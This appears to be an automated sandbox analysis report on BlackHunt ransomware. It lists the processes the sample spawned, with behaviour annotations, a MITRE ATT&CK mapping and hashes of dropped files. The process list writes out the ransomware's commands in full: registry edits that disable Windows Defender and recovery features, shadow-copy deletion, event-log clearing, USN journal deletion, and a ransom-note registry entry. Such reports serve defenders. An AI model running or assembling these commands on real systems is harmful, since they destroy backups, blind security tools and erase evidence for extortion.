C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:4988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2332
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:3560
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:3744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5016
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2380
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8436
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3848
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:3288
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:5884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:3268
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:4016
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:3848
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:532
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:4576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:3372
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:14512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2312
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:1420
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
PID:5192
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:10280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:11084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:8096
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:10808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10808 -s 14562⤵
- Program crash
PID:2112
-
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:15676
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:5340
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:14428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 10808 -ip 108081⤵PID:4016
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:6524
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:9132
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (4)
Downloads
- Filesize: 1KB
  MD5: 7313a819b3b13976b23f05cb31cc048d
  SHA1: 9bb4be9d3dd116ad64e7aca5d00ad91e2857d77f
  SHA256: bb02170d4f046c2007562596cba55c42510a32c192deee5ccdb080ca646b8326
  SHA512: e1f905241ed137cc40b87e38de3076af4f46c0d87bf2a14586ccf3baa9fc4f11e248b9c95e8551b270dcb376af354d5f972c468c20d13d2e1dba270c724bc583
- Filesize: 684B
  MD5: 6c3691af1a5cea2a3629f2916a92662d
  SHA1: f9511e815b521649fba7b31a1ef2a3b5b7dce6af
  SHA256: 70e078a4c1d418f135ab1e23ad1bbacf6984d22163c12ad60110024f5cbde35d
  SHA512: 3898cd999a61ea975d354537c865d00180b63a27c91d1124a928b4b0c0e8644293bddf3fd103602ced63aab68850b0fb4d6ef834d2ccf89f6ef9835d0390f628
- Filesize: 12KB
  MD5: 188ed64c8f732adc69aaa16fa2437b1a
  SHA1: 28a2cf13ce46640ea450a15471b3e77bb3d4c266
  SHA256: 6afb24f7cf3c406d8d7976f912024fd4b5b7f23cfd923422823437f805f48c5f
  SHA512: 29a8f9d4eaa342b73c10c667f01b5b4f06634f82f9a43de2c7b0b1c11492eb990410322f4cff41141d6f3ad952f0f8ba6d3ce8fe7a6d015faf7fb09059eedabf